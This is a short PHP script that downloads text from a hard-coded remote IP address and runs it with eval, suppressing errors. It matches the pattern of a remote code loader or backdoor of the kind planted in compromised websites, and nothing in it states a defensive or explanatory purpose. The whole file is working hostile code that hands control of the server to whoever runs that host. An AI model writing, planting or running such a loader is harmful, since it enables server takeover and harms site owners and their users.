<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://192.187.99.106/z60516_7/stat/index.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($ch);
curl_close($ch);
if(!empty($d)) @eval('?>'. $d);
?>